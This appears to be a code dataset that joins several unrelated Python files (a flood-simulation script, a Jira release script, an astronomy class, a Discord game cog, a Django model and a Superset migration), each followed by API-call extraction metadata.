#------------------------------------------------------------------------------
# BOYD PIPE CULVERT
#------------------------------------------------------------------------------
losses = {'inlet':0.5, 'outlet':1.0, 'bend':0.0, 'grate':0.0, 'pier': 0.0, 'other': 0.0}
ep0 = numpy.array([296660.390,6180017.186])
ep1 = numpy.array([296649.976,6180038.872])
invert_elevations=[12.40,12.20]
culvert = Boyd_pipe_operator(domain,
losses=losses,
diameter=1.0,
end_points=[ep0, ep1],
invert_elevations=invert_elevations,
use_momentum_jet=False,
use_velocity_head=False,
manning=0.013,
logging=True,
label='boyd_pipe',
verbose=False)
#------------------------------------------------------------------------------
# APPLY FLOW
#------------------------------------------------------------------------------
line=[[296669.258,6179974.191],[296677.321,6179976.449]]
anuga.parallel.Inlet_operator(domain, line, 1.0)
#------------------------------------------------------------------------------
# SETUP BOUNDARY CONDITIONS
#------------------------------------------------------------------------------
print ('Available boundary tags', domain.get_boundary_tags())
Br = anuga.Reflective_boundary(domain)
Bd = anuga.Dirichlet_boundary([0,0,0])
domain.set_boundary({'west': Bd, 'south': Br, 'north': Bd, 'east': Bd})
#------------------------------------------------------------------------------
# EVOLVE SYSTEM THROUGH TIME
#------------------------------------------------------------------------------
import time
t0 = time.time()
for t in domain.evolve(yieldstep = 1, finaltime = 4000):
print (domain.timestepping_statistics())
print (domain.boundary_statistics(quantities='stage'))
print ('Finished')
| [
"anuga.Domain",
"anuga.Reflective_boundary",
"anuga.parallel.parallel_operator_factory.Boyd_pipe_operator",
"numpy.array",
"anuga.parallel.Inlet_operator",
"anuga.create_mesh_from_regions",
"time.time",
"anuga.Dirichlet_boundary"
] | [((1311, 1508), 'anuga.create_mesh_from_regions', 'create_mesh_from_regions', (['bounding_polygon'], {'boundary_tags': "{'south': [0], 'east': [1], 'north': [2], 'west': [3]}", 'maximum_triangle_area': '(1.0)', 'filename': 'meshname', 'use_cache': '(False)', 'verbose': '(True)'}), "(bounding_polygon, boundary_tags={'south': [0],\n 'east': [1], 'north': [2], 'west': [3]}, maximum_triangle_area=1.0,\n filename=meshname, use_cache=False, verbose=True)\n", (1335, 1508), False, 'from anuga import file_function, Polygon_function, read_polygon, create_mesh_from_regions, Domain, Inlet_operator\n'), ((1733, 1780), 'anuga.Domain', 'Domain', (['meshname'], {'use_cache': '(False)', 'verbose': '(True)'}), '(meshname, use_cache=False, verbose=True)\n', (1739, 1780), False, 'from anuga import file_function, Polygon_function, read_polygon, create_mesh_from_regions, Domain, Inlet_operator\n'), ((2507, 2544), 'numpy.array', 'numpy.array', (['[296660.39, 6180017.186]'], {}), '([296660.39, 6180017.186])\n', (2518, 2544), False, 'import anuga, anuga.parallel, numpy, time, os, glob\n'), ((2553, 2591), 'numpy.array', 'numpy.array', (['[296649.976, 6180038.872]'], {}), '([296649.976, 6180038.872])\n', (2564, 2591), False, 'import anuga, anuga.parallel, numpy, time, os, glob\n'), ((2651, 2890), 'anuga.parallel.parallel_operator_factory.Boyd_pipe_operator', 'Boyd_pipe_operator', (['domain'], {'losses': 'losses', 'diameter': '(1.0)', 'end_points': '[ep0, ep1]', 'invert_elevations': 'invert_elevations', 'use_momentum_jet': '(False)', 'use_velocity_head': '(False)', 'manning': '(0.013)', 'logging': '(True)', 'label': '"""boyd_pipe"""', 'verbose': '(False)'}), "(domain, losses=losses, diameter=1.0, end_points=[ep0,\n ep1], invert_elevations=invert_elevations, use_momentum_jet=False,\n use_velocity_head=False, manning=0.013, logging=True, label='boyd_pipe',\n verbose=False)\n", (2669, 2890), False, 'from anuga.parallel.parallel_operator_factory import Inlet_operator, Boyd_box_operator, Boyd_pipe_operator\n'), ((3173, 3221), 'anuga.parallel.Inlet_operator', 'anuga.parallel.Inlet_operator', (['domain', 'line', '(1.0)'], {}), '(domain, line, 1.0)\n', (3202, 3221), False, 'import anuga, anuga.parallel, numpy, time, os, glob\n'), ((3488, 3521), 'anuga.Reflective_boundary', 'anuga.Reflective_boundary', (['domain'], {}), '(domain)\n', (3513, 3521), False, 'import anuga, anuga.parallel, numpy, time, os, glob\n'), ((3528, 3563), 'anuga.Dirichlet_boundary', 'anuga.Dirichlet_boundary', (['[0, 0, 0]'], {}), '([0, 0, 0])\n', (3552, 3563), False, 'import anuga, anuga.parallel, numpy, time, os, glob\n'), ((3856, 3867), 'time.time', 'time.time', ([], {}), '()\n', (3865, 3867), False, 'import time\n')] |
#!/usr/bin/env python
import os
import requests
from datetime import datetime
jira_version_name = os.getenv('JIRA_VERSION_NAME')
jira_project = os.getenv('JIRA_PROJ')
auth_user = os.getenv('JIRA_AUTH_USER')
auth_password = os.getenv('JIRA_AUTH_PASSWORD')
if jira_version_name is None:
print("Version Name Variable [JIRA_VERSION_NAME] is not defined.")
exit(2)
if jira_project is None:
print("Jira Project Environment Variable [JIRA_PROJ] is not defined.")
exit(2)
if auth_user is None:
print("Authentication User Environment Variable [JIRA_AUTH_USER] is not defined.")
exit(2)
if auth_password is None:
print("Authentication Password Environment Variable [JIRA_AUTH_PASSWORD] is not defined.")
exit(2)
jira_version_date = datetime.today().strftime('%d/%b/%Y')
jira_url = os.getenv('JIRA_URL', 'https://jira.org')
jira_version_release_env = os.getenv('JIRA_VERSION_RELEASED', 'true')
jira_version_release = True
if jira_version_release_env == 'false':
jira_version_release = False
jira_version_description =os.getenv('JIRA_VERSION_DESCRIPTION', 'Version {}'.format(jira_version_name))
print('Will Attempt to create version [{}] for project [{}] '.format(jira_version_name, jira_project))
jira_api_version = os.getenv('JIRA_API_VERSION', '2')
if jira_api_version == '2':
data = {
'description': jira_version_description,
'name': jira_version_name,
'userReleaseDate': jira_version_date,
'project': jira_project,
'released': jira_version_release
}
# Construct URL
api_url = ('%(url)s/rest/api/2/version' % {'url': jira_url})
print('Sending request to:')
print(api_url)
print('with body')
print(data)
# Post build status to Bitbucket
response = requests.post(api_url, auth=(auth_user, auth_password), json=data)
print('Response:')
print(response)
print(response.text)
if response:
exit(0)
else:
exit(1)
| [
"datetime.datetime.today",
"requests.post",
"os.getenv"
] | [((99, 129), 'os.getenv', 'os.getenv', (['"""JIRA_VERSION_NAME"""'], {}), "('JIRA_VERSION_NAME')\n", (108, 129), False, 'import os\n'), ((145, 167), 'os.getenv', 'os.getenv', (['"""JIRA_PROJ"""'], {}), "('JIRA_PROJ')\n", (154, 167), False, 'import os\n'), ((180, 207), 'os.getenv', 'os.getenv', (['"""JIRA_AUTH_USER"""'], {}), "('JIRA_AUTH_USER')\n", (189, 207), False, 'import os\n'), ((224, 255), 'os.getenv', 'os.getenv', (['"""JIRA_AUTH_PASSWORD"""'], {}), "('JIRA_AUTH_PASSWORD')\n", (233, 255), False, 'import os\n'), ((818, 859), 'os.getenv', 'os.getenv', (['"""JIRA_URL"""', '"""https://jira.org"""'], {}), "('JIRA_URL', 'https://jira.org')\n", (827, 859), False, 'import os\n'), ((888, 930), 'os.getenv', 'os.getenv', (['"""JIRA_VERSION_RELEASED"""', '"""true"""'], {}), "('JIRA_VERSION_RELEASED', 'true')\n", (897, 930), False, 'import os\n'), ((1262, 1296), 'os.getenv', 'os.getenv', (['"""JIRA_API_VERSION"""', '"""2"""'], {}), "('JIRA_API_VERSION', '2')\n", (1271, 1296), False, 'import os\n'), ((1781, 1847), 'requests.post', 'requests.post', (['api_url'], {'auth': '(auth_user, auth_password)', 'json': 'data'}), '(api_url, auth=(auth_user, auth_password), json=data)\n', (1794, 1847), False, 'import requests\n'), ((768, 784), 'datetime.datetime.today', 'datetime.today', ([], {}), '()\n', (782, 784), False, 'from datetime import datetime\n')] |
import logging
import ephem
from . import Jnames, Bname_dict, cat_3C_dict, cal_dict, Bnames, EphemException
#from Astronomy.Ephem import EphemException
module_logger = logging.getLogger(__name__)
class Quasar(ephem.FixedBody):
"""
ephem.FixedBody() with "J" or "B" name
"""
def __init__(self,name):
"""
Create an instance of a Quasar()
The preferred name form is like 'J2305+4707'. However, 'B2303+46'
is also exceptable, as is '2305+4707'. In the latter case, it must
be a Julian epoch name.
The name may also be given as "3C84" or "3C 84"
Notes
=====
Instance methods and attributes
-------------------------------
flux - radio flux in janskys at a specified frequency
flux_ref - source for radio flux data
freq - frequency for which flux was calculated
date - date for which flux was calculated, if based on Michigan data
Jname - Julian epoch name
Bname - Besselian epoch name
Inherited methods and attributes
--------------------------------
All methods and attributes of ephem.FixedBody()
name - Julian epoch name without leading "J"
"""
super(Quasar,self).__init__()
self.logger = logging.getLogger(module_logger.name+".Quasar")
if name[0] == "J":
self.Jname = self.name
self.name = name[1:]
try:
self.Bname = "B"+Bnames[self.name]
except KeyError:
raise EphemException
elif name[0] == "B":
self.Bname = name
try:
self.name = Bname_dict[name[1:]]
except KeyError:
raise EphemException
self.Jname = "J"+self.name
elif name[:2] == "3C":
name = name.replace(" ","")
try:
self.name = cat_3C_dict[name]
except KeyError:
raise EphemException
self.Jname = "J"+self.name
self.Bname = "B"+Bnames[self.name]
else:
try:
Jnames.index("J"+name)
except:
raise EphemException
self.name = name
self.Jname = "J"+self.name
self.Bname = "B"+Bnames[self.name]
quasar_data = cal_dict[self.name]
self._ra = ephem.hours(str(quasar_data['ra']))
self._dec = ephem.degrees(str(quasar_data['dec']))
self.logger.debug("__init__: RA, dec.: %.3f, %.3f", self._ra, self._dec)
self._epoch = ephem.J2000
self._class = "Q"
# to initialize ra, dec to something
self.compute("2000/1/1 00:00:00")
self.freq = None
self.flux = None
self.flux_ref = None
self.date = None
self.pressure = 0
def interpolate_flux(self, freq, date=None):
"""
Flux of source at given frequency in GHz.
The Michigan data are interpolated if possible, that is, the source is
in the data base and the frequency requested is between 4 and 15 GHz.
Otherwise the VLA data are used.
If the date is not given, it is assumed to be now.
"""
self.freq = freq
if self.freq > 4 and self.freq < 15:
if date == None:
self.date = datetime.datetime.now()
else:
self.date = date
try:
# in Michigan data
michigan.Bnames.index(self.Bname[1:])
self.flux = michigan.polate_flux(self.Bname[1:],
date2num(self.date),
freq)
self.logger.debug("interpolate_flux: Michigan flux is %.3f", self.flux)
self.flux_ref = "Michigan"
return self.flux
except ValueError:
# Not in the Michigan catalog or no date given
self.logger.debug("interpolate_flux: %s = %s is not in the Michigan catalog",
self.name, self.Bname)
else:
print("Outside Michigan frequency range")
# try VLA cals
try:
cal_data = vla_cal.get_cal_data(self.Jname[1:])
freqs,fluxes = vla_cal.get_flux_data(cal_data)
self.flux = vla_cal.interpolate_flux(freqs,fluxes,freq)
self.flux_ref = "VLA"
self.logger.debug("interpolate_flux: %s flux is %.3f", self.flux_ref, self.flux)
return self.flux
except ValueError:
self.flux = None
self.flux_ref = None
return None
| [
"logging.getLogger"
] | [((171, 198), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (188, 198), False, 'import logging\n'), ((1215, 1264), 'logging.getLogger', 'logging.getLogger', (["(module_logger.name + '.Quasar')"], {}), "(module_logger.name + '.Quasar')\n", (1232, 1264), False, 'import logging\n')] |
from redbot.core import commands, checks, Config
from redbot.core.utils import menus
import asyncio
import discord
import random
import logging
from .mdtembed import Embed
from .crystal import FEATUREDS, BCB
log = logging.getLogger(name="red.demaratus.mcoc")
class Mcoc(commands.Cog):
"""Fun Games and Tools for Marvel Contest of Champions."""
__version__ = "1.3.1"
def __init__(self, bot):
self.bot = bot
self.config = Config.get_conf(
self, identifier=153607829, force_registration=True
)
self.config.register_user(
roster={
"5": {},
"4": {},
"3": {}
}
)
async def red_delete_data_for_user(self, **kwargs):
"""Nothing to delete."""
return
@commands.group()
async def mcocsupport(self, ctx):
"""Cog support and information."""
@mcocsupport.command()
async def version(self, ctx):
"""Version of the mcoc cog"""
embed = Embed.create(
self, ctx, title="Cog Version",
description="Current version: `{}`".format(self.__version__),
)
await ctx.send(embed=embed)
@commands.command()
@commands.cooldown(1, 60, commands.BucketType.user)
async def crystal(self, ctx):
"""Chooses a random champion."""
star = random.choice(['3', '4', '5'])
key, image = (random.choice(list(FEATUREDS.items())))
roster = await self.config.user(ctx.author).roster.get_raw()
await self.roster_logistics(ctx, star, key, roster)
data = Embed.create(
self, ctx, title='You got... <:crystal:776941489464672266>',
description="⭐" * int(star)
)
data.set_image(url=image)
await ctx.send(embed=data)
@commands.group(invoke_without_command=True)
async def roster(self, ctx):
"""Access your crystal rosters."""
await ctx.send("<:success:777167188816560168> - `You are eligible for a roster, the champions you collect now will be stored.`\n<:error:777117297273077760> - `This feature is currently unavailable.`")
@roster.command(name="5")
async def five(self, ctx, star: str = None):
if await self.bot.is_owner(ctx.author) is False:
return await ctx.send(_("<:success:777167188816560168> - `You are eligible for a roster, the champions you collect now will be stored.`\n<:error:777117297273077760> - `This feature is currently unavailable.`"), delete_after=10)
if star is None:
star = "5"
try:
roster: dict = await self.config.user(ctx.author).roster.get_raw(star)
except KeyError:
roster: dict = await self.config.user(ctx.author).roster.get_raw("5")
if len(roster.values()) > 0:
roster = "\n".join(
["{} s{}".format(key, value) for key, value in roster.items()]
)
embed = discord.Embed(
title="Crystal Roster: {} Star".format(star), color=ctx.author.color, description=":star::star::star::star::star:"
)
embed.add_field(name="{}'s Roster :arrow_down:".format(
ctx.author.name), value=roster)
else:
embed = discord.Embed(
title="Crystal Roster: {} Star :star:".format(star), color=ctx.author.color, description=(
"You don't have any {} star champions!\n"
"Collect some using `{}crystal`!".format(
star, ctx.clean_prefix
)
)
)
await ctx.send(embed=embed)
@roster.command(name="4")
async def four(self, ctx, star: str = None):
if await self.bot.is_owner(ctx.author) is False:
return await ctx.send("<:success:777167188816560168> - `You are eligible for a roster, the champions you collect now will be stored.`\n<:error:777117297273077760> - `This feature is currently unavailable.`")
if star is None:
star = "4"
try:
roster: dict = await self.config.user(ctx.author).roster.get_raw(star)
except KeyError:
roster: dict = await self.config.user(ctx.author).roster.get_raw("4")
if len(roster.values()) > 0:
roster = "\n".join(
["{} s{}".format(key, value) for key, value in roster.items()]
)
embed = discord.Embed(
title="Crystal Roster: {} Star".format(star), color=ctx.author.color, description=":star::star::star::star:"
)
embed.add_field(name="{}'s Roster :arrow_down:".format(
ctx.author.name), value=roster)
else:
embed = discord.Embed(
title="Crystal Roster: {} Star :star:".format(star), color=ctx.author.color, description=(
"You don't have any {} star champions!\n"
"Collect some using `{}crystal`!".format(
star, ctx.clean_prefix
)
)
)
await ctx.send(embed=embed)
@roster.command(name="3")
async def three(self, ctx, star: str = None):
if await self.bot.is_owner(ctx.author) is False:
return await ctx.send("<:success:777167188816560168> - `You are eligible for a roster, the champions you collect now will be stored.`\n<:error:777117297273077760> - `This feature is currently unavailable.`")
if star is None:
star = "3"
try:
roster: dict = await self.config.user(ctx.author).roster.get_raw(star)
except KeyError:
roster: dict = await self.config.user(ctx.author).roster.get_raw("3")
if len(roster.values()) > 0:
roster = "\n".join(
["{} s{}".format(key, value) for key, value in roster.items()]
)
embed = discord.Embed(
title="Crystal Roster: {} Star".format(star), color=ctx.author.color, description=":star::star::star:"
)
embed.add_field(name="{}'s Roster :arrow_down:".format(
ctx.author.name), value=roster)
else:
embed = discord.Embed(
title="Crystal Roster: {} Star :star:".format(star), color=ctx.author.color, description=(
"<error:777117297273077760> You don't have any {} star champions!\n"
"Collect some using `{}crystal`!".format(
star, ctx.clean_prefix
)
)
)
await ctx.send(embed=embed)
@commands.group()
async def battlechip(self, ctx):
"""Opens a battlechip crystal from MCOC."""
@battlechip.command()
@commands.cooldown(1, 30, commands.BucketType.user)
async def basic(self, ctx):
"""Open a basic battlechip crystal."""
drop_rate = round(random.uniform(0, 100), 2)
if drop_rate < 0.02:
link = BCB[0]
title = "4 Star Punisher"
description = (
"This tier has a `0.02%` chance.\nCongratulations!\n"
"Message Kreusada#0518 with a screenshot to be added to the hall of fame!"
)
elif drop_rate < 0.65:
link = BCB[0]
title = "3 Star Punisher"
description = "This tier has a `0.65%` chance.\nCongratulations!"
elif drop_rate < 0.35:
link = BCB[1]
title = "Energy Refill"
description = "This tier has a `0.35%` chance.\nCongratulations!"
elif drop_rate < 2:
link = BCB[2]
title = "45 Units"
description = ""
elif drop_rate < 6:
link = BCB[2]
title = "15 Units"
description = ""
elif drop_rate < 30:
link = BCB[3]
title = "10,000 Gold"
description = ""
else:
link = BCB[3]
title = "2,500 Gold"
description = ""
data = Embed.create(self, ctx, title=title,
description=description, image=link)
await ctx.send(embed=data)
@battlechip.command()
async def uncollected(self, ctx):
"""Open an uncollected battlechip crystal."""
drop_rate = round(random.uniform(0, 100), 2)
if drop_rate < 0.02:
link = BCB[0]
title = "5 Star Punisher"
description = "This tier has a `0.02%` chance.\nCongratulations!"
elif drop_rate < 0.65:
link = BCB[0]
title = "4 Star Punisher"
description = "This tier has a `0.65%` chance.\nCongratulations!"
elif drop_rate < 0.35:
link = BCB[1]
title = "Five Energy Refills"
description = "This tier has a `0.35%` chance.\nCongratulations!"
elif drop_rate < 2:
link = BCB[2]
title = "225 Units"
description = ""
elif drop_rate < 6:
link = BCB[2]
title = "75 Units"
description = ""
elif drop_rate < 30:
link = BCB[3]
title = "50,000 Gold"
description = ""
elif drop_rate < 45:
link = BCB[3]
title = "25,000 Gold"
description = ""
else:
link = BCB[3]
title = "10,000 Gold"
description = ""
data = Embed.create(
self, ctx,
title="You got {}!".format(title), description="{}".format(description),
image=link
)
await ctx.send(embed=data)
async def roster_logistics(self, ctx: commands.Context, star: str, champion: str, roster: dict) -> None:
intstar = int(star)
if intstar <= 0 or intstar > 6:
intstar = 6
star = "6"
if intstar == 1 or intstar == 2:
sigs = 1
elif intstar == 3:
sigs = 8
else:
sigs = 20
try:
roster[star][champion] += sigs # Test
except KeyError:
roster[star][champion] = 0
await self.config.user(ctx.author).roster.set_raw(value=roster)
@commands.command()
async def awbadge(self, ctx, tier: str = None, group: int = None):
"""Get alliance war badges."""
if group is not None and group >= 1 and group < 4:
group_num = group - 1 # This is to make sure that it will work with the urls
tiers = {
"master": [
"https://media.discordapp.net/attachments/401476363707744257/738083791654092940/47EFB6D4D1380ABD2C40D2C7B0533A29245F7955.png",
"https://media.discordapp.net/attachments/401476363707744257/738083791113027654/650E29ADB8C5C382FF5A358113B2C02B8EADA415.png",
"https://media.discordapp.net/attachments/401476363707744257/738083791440052294/08BA0A081A9D56E35E60E3FD61FAB7ED9A10CD00.png"
],
"platinum": [
"https://media.discordapp.net/attachments/401476363707744257/738083790718631937/E78E2BAF9B0C9BA6C7FE45BE726FFB0B0B0CACFD.png",
"https://media.discordapp.net/attachments/401476363707744257/738083790362116116/487EA26A1BA0F2C2848E7C87F10430BD218C2178.png",
"https://media.discordapp.net/attachments/401476363707744257/738083790559117352/0ED8BD10441C6D086AEB7BBA5271269F46E009D1.png"
],
"gold": [
"https://media.discordapp.net/attachments/401476363707744257/738083790131298375/76BC21BF523A415866D19814BD8AF4BE16EF30A9.png",
"https://media.discordapp.net/attachments/401476363707744257/738083998462509096/8CD52FEB7540016B6ABA1EC67B9F1777E3C29878.png",
"https://media.discordapp.net/attachments/401476363707744257/738084001926873098/3A9A8FDA006D0BE225242AAA5909021CD52BCFB3.png"
],
"silver": [
"https://media.discordapp.net/attachments/401476363707744257/738084001465499789/4B389D377A94EDA747B38DF640C0B33A3A3F61AE.png",
"https://media.discordapp.net/attachments/401476363707744257/738084001465499789/4B389D377A94EDA747B38DF640C0B33A3A3F61AE.png",
"https://media.discordapp.net/attachments/401476363707744257/738083994612006914/5302FA8FA04735224847C8BBF82D1D54C8567B9C.png"
],
"bronze": [
"https://media.discordapp.net/attachments/401476363707744257/738083995211792404/719AC2C2AB5833D815C899DAF9ADB7CF11819CBA.png",
"https://media.discordapp.net/attachments/401476363707744257/738083993043337276/E636A90C3F0DFFDAED0176D972AA0C73F3E40FF8.png",
"https://media.discordapp.net/attachments/401476363707744257/738083997866786876/5B06D509847E0FA1405A50021486C1A5D8C6F9B2.png"
],
"stone": [
"https://media.discordapp.net/attachments/401476363707744257/738083996054978730/9AC92A2FDC2996C346125296356C664373147F2F.png",
"https://media.discordapp.net/attachments/401476363707744257/738083993681002586/BF3D13EACC9F44216E754884AA183185761C84CF.png",
"https://media.discordapp.net/attachments/401476363707744257/738084098857238670/EA938C0B0C2AE3E6DB91514F5F8768C4F033D373.png"
]
}
tier = tier.lower() if tier is not None else None
if tier is None or tier not in tiers:
embed = Embed.create(
self, ctx, title="Alliance War Badge Tiers",
description="Please choose one of the tiers below :arrow_down:\nSyntax: `,awbadge <tier>`"
)
normal = "\n".join([t.capitalize() for t in tiers.keys()])
embed.add_field(
# Unfortunatly I have to do this to make sure that participation gets in the list :/
name="Badges", value="{}\nParticipation".format(normal)
)
normal = "\n".join(tiers)
return await ctx.send(embed=embed)
if tier == "participation":
embed = Embed.create(
self, ctx, title="Participation",
image="https://media.discordapp.net/attachments/401476363707744257/738083790886535228/DA7D39277836A9CF1B39A68D37EAF99999B366C7.png"
)
return await ctx.send(embed=embed)
if group is None:
embeds = []
for i in range(3):
embed = Embed.create(
self, ctx,
title="{} Badges".format(tier.capitalize()), image=tiers[tier][i]
)
embeds.append(embed)
msg = await ctx.send(embed=embeds[0])
control = menus.DEFAULT_CONTROLS if len(embeds) > 1 else {
"\N{CROSS MARK}": menus.close_menu
}
asyncio.create_task(menus.menu(ctx, embeds, control, message=msg))
menus.start_adding_reactions(msg, control.keys())
else:
embed = Embed.create(
self, ctx,
title="{} Badge".format(tier.capitalize()), description="{} {}".format(tier.capitalize(), group),
image=tiers[tier][group_num]
)
await ctx.send(embed=embed)
| [
"logging.getLogger",
"redbot.core.utils.menus.menu",
"redbot.core.commands.cooldown",
"random.choice",
"random.uniform",
"redbot.core.Config.get_conf",
"redbot.core.commands.command",
"redbot.core.commands.group"
] | [((215, 259), 'logging.getLogger', 'logging.getLogger', ([], {'name': '"""red.demaratus.mcoc"""'}), "(name='red.demaratus.mcoc')\n", (232, 259), False, 'import logging\n'), ((817, 833), 'redbot.core.commands.group', 'commands.group', ([], {}), '()\n', (831, 833), False, 'from redbot.core import commands, checks, Config\n'), ((1215, 1233), 'redbot.core.commands.command', 'commands.command', ([], {}), '()\n', (1231, 1233), False, 'from redbot.core import commands, checks, Config\n'), ((1239, 1289), 'redbot.core.commands.cooldown', 'commands.cooldown', (['(1)', '(60)', 'commands.BucketType.user'], {}), '(1, 60, commands.BucketType.user)\n', (1256, 1289), False, 'from redbot.core import commands, checks, Config\n'), ((1833, 1876), 'redbot.core.commands.group', 'commands.group', ([], {'invoke_without_command': '(True)'}), '(invoke_without_command=True)\n', (1847, 1876), False, 'from redbot.core import commands, checks, Config\n'), ((6651, 6667), 'redbot.core.commands.group', 'commands.group', ([], {}), '()\n', (6665, 6667), False, 'from redbot.core import commands, checks, Config\n'), ((6789, 6839), 'redbot.core.commands.cooldown', 'commands.cooldown', (['(1)', '(30)', 'commands.BucketType.user'], {}), '(1, 30, commands.BucketType.user)\n', (6806, 6839), False, 'from redbot.core import commands, checks, Config\n'), ((10255, 10273), 'redbot.core.commands.command', 'commands.command', ([], {}), '()\n', (10271, 10273), False, 'from redbot.core import commands, checks, Config\n'), ((453, 521), 'redbot.core.Config.get_conf', 'Config.get_conf', (['self'], {'identifier': '(153607829)', 'force_registration': '(True)'}), '(self, identifier=153607829, force_registration=True)\n', (468, 521), False, 'from redbot.core import commands, checks, Config\n'), ((1380, 1410), 'random.choice', 'random.choice', (["['3', '4', '5']"], {}), "(['3', '4', '5'])\n", (1393, 1410), False, 'import random\n'), ((6945, 6967), 'random.uniform', 'random.uniform', (['(0)', '(100)'], {}), '(0, 100)\n', (6959, 6967), False, 'import random\n'), ((8357, 8379), 'random.uniform', 'random.uniform', (['(0)', '(100)'], {}), '(0, 100)\n', (8371, 8379), False, 'import random\n'), ((14892, 14937), 'redbot.core.utils.menus.menu', 'menus.menu', (['ctx', 'embeds', 'control'], {'message': 'msg'}), '(ctx, embeds, control, message=msg)\n', (14902, 14937), False, 'from redbot.core.utils import menus\n')] |
from interactionfreepy import IFBroker, IFWorker
from LibSync import LibSync
import sys
import threading
from datetime import datetime, timedelta
import time
from NTP import NTPSyncer
class IFNode:
def __init__(self):
self.inited = False
def init(self, serverRootURL,localRootPath):
if self.inited:raise RuntimeError('Already inited.')
IFWorker('tcp://localhost:{}'.format(localPort), 'LibSync', LibSync(serverRootURL, localRootPath))
self.inited=True
def test(self, a):
return 'IFNodePy: ' + a
def startTimeSyncLoop():
s = NTPSyncer('172.16.60.200')
threading.Thread(target=lambda: s.lock(60, 120), daemon=True).start()
return s
# while True:
# time.sleep(1)
# print('hahaha')
# f= open('D:\\test.txt', 'a')
# f.write('hahaha\n')
# f.flush()
if __name__ == '__main__':
print('start')
localPort = 224
broker = IFBroker('tcp://*:{}'.format(localPort))
broker.startWebSocket(82, '/ws/')
# serverRootURL ='http://172.16.60.200/IFAssets/IFNodeApplications/'
# localRootPath ='C:\\Users\\Administrator\\Downloads\\LibSyncTest\\'
serverRootURL = sys.stdin.readline().strip()
localRootPath = sys.stdin.readline().strip()
IFWorker('tcp://localhost:{}'.format(localPort), 'IFNodePy', IFNode())
IFWorker('tcp://localhost:{}'.format(localPort), 'LibSync', LibSync(serverRootURL, localRootPath))
IFWorker('tcp://localhost:{}'.format(localPort), 'TimeSync', startTimeSyncLoop())
while True:
l = sys.stdin.readline()
if (l == None or l == -1 or len(l) == 0):
sys.exit(0)
| [
"LibSync.LibSync",
"sys.exit",
"sys.stdin.readline",
"NTP.NTPSyncer"
] | [((556, 582), 'NTP.NTPSyncer', 'NTPSyncer', (['"""172.16.60.200"""'], {}), "('172.16.60.200')\n", (565, 582), False, 'from NTP import NTPSyncer\n'), ((1326, 1363), 'LibSync.LibSync', 'LibSync', (['serverRootURL', 'localRootPath'], {}), '(serverRootURL, localRootPath)\n', (1333, 1363), False, 'from LibSync import LibSync\n'), ((1472, 1492), 'sys.stdin.readline', 'sys.stdin.readline', ([], {}), '()\n', (1490, 1492), False, 'import sys\n'), ((414, 451), 'LibSync.LibSync', 'LibSync', (['serverRootURL', 'localRootPath'], {}), '(serverRootURL, localRootPath)\n', (421, 451), False, 'from LibSync import LibSync\n'), ((1114, 1134), 'sys.stdin.readline', 'sys.stdin.readline', ([], {}), '()\n', (1132, 1134), False, 'import sys\n'), ((1161, 1181), 'sys.stdin.readline', 'sys.stdin.readline', ([], {}), '()\n', (1179, 1181), False, 'import sys\n'), ((1545, 1556), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1553, 1556), False, 'import sys\n')] |
from django.db import models
class Pet(models.Model):
pet_name = models.CharField(max_length=20)
def __str__(self):
return self.pet_name
| [
"django.db.models.CharField"
] | [((70, 101), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(20)'}), '(max_length=20)\n', (86, 101), False, 'from django.db import models\n')] |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Add force_screenshot to alerts/reports
Revision ID: bb38f40aa3ff
Revises: <PASSWORD>
Create Date: 2021-12-10 19:25:29.802949
"""
# revision identifiers, used by Alembic.
revision = "bb38f40aa3ff"
down_revision = "3<PASSWORD>"
import sqlalchemy as sa
from alembic import op
from sqlalchemy.ext.declarative import declarative_base
from superset import db
Base = declarative_base()
class ReportSchedule(Base):
__tablename__ = "report_schedule"
id = sa.Column(sa.Integer, primary_key=True)
type = sa.Column(sa.String(50), nullable=False)
force_screenshot = sa.Column(sa.Boolean, default=False)
def upgrade():
with op.batch_alter_table("report_schedule") as batch_op:
batch_op.add_column(sa.Column("force_screenshot", sa.Boolean(), default=False))
bind = op.get_bind()
session = db.Session(bind=bind)
for report in session.query(ReportSchedule).all():
# Update existing alerts that send chart screenshots so that the cache is
# bypassed. We don't turn this one for dashboards because (1) it's currently
# not supported but also because (2) it can be very expensive.
report.force_screenshot = report.type == "Alert" and report.chart_id is not None
session.commit()
def downgrade():
with op.batch_alter_table("report_schedule") as batch_op:
batch_op.drop_column("force_screenshot")
| [
"alembic.op.get_bind",
"superset.db.Session",
"sqlalchemy.Boolean",
"alembic.op.batch_alter_table",
"sqlalchemy.String",
"sqlalchemy.ext.declarative.declarative_base",
"sqlalchemy.Column"
] | [((1154, 1172), 'sqlalchemy.ext.declarative.declarative_base', 'declarative_base', ([], {}), '()\n', (1170, 1172), False, 'from sqlalchemy.ext.declarative import declarative_base\n'), ((1251, 1290), 'sqlalchemy.Column', 'sa.Column', (['sa.Integer'], {'primary_key': '(True)'}), '(sa.Integer, primary_key=True)\n', (1260, 1290), True, 'import sqlalchemy as sa\n'), ((1366, 1402), 'sqlalchemy.Column', 'sa.Column', (['sa.Boolean'], {'default': '(False)'}), '(sa.Boolean, default=False)\n', (1375, 1402), True, 'import sqlalchemy as sa\n'), ((1582, 1595), 'alembic.op.get_bind', 'op.get_bind', ([], {}), '()\n', (1593, 1595), False, 'from alembic import op\n'), ((1610, 1631), 'superset.db.Session', 'db.Session', ([], {'bind': 'bind'}), '(bind=bind)\n', (1620, 1631), False, 'from superset import db\n'), ((1312, 1325), 'sqlalchemy.String', 'sa.String', (['(50)'], {}), '(50)\n', (1321, 1325), True, 'import sqlalchemy as sa\n'), ((1429, 1468), 'alembic.op.batch_alter_table', 'op.batch_alter_table', (['"""report_schedule"""'], {}), "('report_schedule')\n", (1449, 1468), False, 'from alembic import op\n'), ((2065, 2104), 'alembic.op.batch_alter_table', 'op.batch_alter_table', (['"""report_schedule"""'], {}), "('report_schedule')\n", (2085, 2104), False, 